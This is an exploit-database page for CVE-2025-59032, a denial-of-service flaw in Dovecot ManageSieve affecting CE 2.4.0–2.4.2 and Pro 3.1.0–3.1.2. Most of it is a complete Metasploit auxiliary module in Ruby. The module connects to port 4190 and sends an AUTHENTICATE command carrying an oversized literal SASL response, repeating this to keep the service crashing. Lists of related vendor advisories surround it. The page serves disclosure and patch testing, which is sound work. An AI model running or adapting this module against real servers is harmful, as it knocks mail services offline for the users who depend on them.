📄 Dovecot ManageSieve Crash Denial of Service

🗓️ 22 Apr 2026 00:00:00Reported by indoushkaType

Dovecot ManageSieve DoS: AUTHENTICATE with literal SASL crashes service; affects CE 2.4.0–2.4.2 and Pro 3.1.0–3.1.2.

Reporter	Title	Published	Views	Family All 144
ATTACKERKB	CVE-2025-59032	27 Mar 202608:10	–	attackerkb
Tenable Nessus	Alibaba Cloud Linux 3 : 0119: dovecot (ALINUX3-SA-2026:0119)	25 May 202600:00	–	nessus
Tenable Nessus	AlmaLinux 10 : dovecot (ALSA-2026:13498)	6 May 202600:00	–	nessus
Tenable Nessus	AlmaLinux 8 : dovecot (ALSA-2026:13830)	5 May 202600:00	–	nessus
Tenable Nessus	Debian dla-4556 : dovecot-auth-lua - security update	15 Jun 202600:00	–	nessus
Tenable Nessus	Debian dsa-6197 : dovecot-auth-lua - security update	5 Apr 202600:00	–	nessus
Tenable Nessus	MiracleLinux 9 : dovecot-2.3.16-15.el9_7.1 (AXSA:2026-567:01)	8 May 202600:00	–	nessus
Tenable Nessus	MiracleLinux 8 : dovecot-2.3.16-7.el8_10 (AXSA:2026-611:02)	13 May 202600:00	–	nessus
Tenable Nessus	openSUSE 16 Security Update : dovecot24 (openSUSE-SU-2026:20554-1)	22 Apr 202600:00	–	nessus
Tenable Nessus	Oracle Linux 10 : dovecot (ELSA-2026-13498)	5 May 202600:00	–	nessus

==================================================================================================================================
    | # Title     : Dovecot ManageSieve Crash Denial of Service Metasploit Module                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a Denial of Service (DoS) vulnerability in the Dovecot ManageSieve service, where improper handling of authentication requests can lead to service crashes.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Dos
      include Msf::Exploit::Remote::Tcp
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot ManageSieve Crash DoS',
            'Description' => %q{
              Dovecot ManageSieve service crashes when receiving an AUTHENTICATE command
              with a literal as SASL initial response. This vulnerability can be exploited
              to repeatedly crash the ManageSieve service, making it unavailable for other
              users.
    
              Affects Dovecot CE core 2.4.0-2.4.2 and Dovecot Pro core 3.1.0-3.1.2.
              Fixed in versions 2.4.3 and 3.1.3.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2025-59032'],
              ['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
              ['CWE', '20']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(4190),
          OptInt.new('ATTEMPTS', [true, 'Number of crash attempts', 10])
        ])
      end
    
      def run
        print_status("Dovecot ManageSieve Crash DoS (CVE-2025-59032)")
        print_status("Target: #{peer}")
    
        datastore['ATTEMPTS'].to_i.times do |i|
          print_status("Crash attempt #{i + 1}/#{datastore['ATTEMPTS']}")
          crash_managesieve
          sleep(2)
        end
    
        print_status("DoS attack completed")
      end
    
      def crash_managesieve
        sock = nil
    
        begin
          sock = connect
    
          banner = sock.get_once
          vprint_status("ManageSieve banner: #{banner}")
    
          payload_data = "A" * 1000
          literal = "{#{payload_data.length}}\r\n"
    
          malicious_payload = "AUTHENTICATE \"PLAIN\" #{literal}"
          malicious_payload += payload_data + "\r\n"
    
          sock.put(malicious_payload)
    
          response = sock.get_once(5)
    
          if response.nil?
            print_good("ManageSieve service crashed (no response)")
          else
            vprint_status("Response: #{response}")
          end
    
        rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused
          print_good("ManageSieve service crashed (connection reset)")
        rescue ::Exception => e
          print_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

22 Apr 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.17.5

EPSS0.00406

SSVC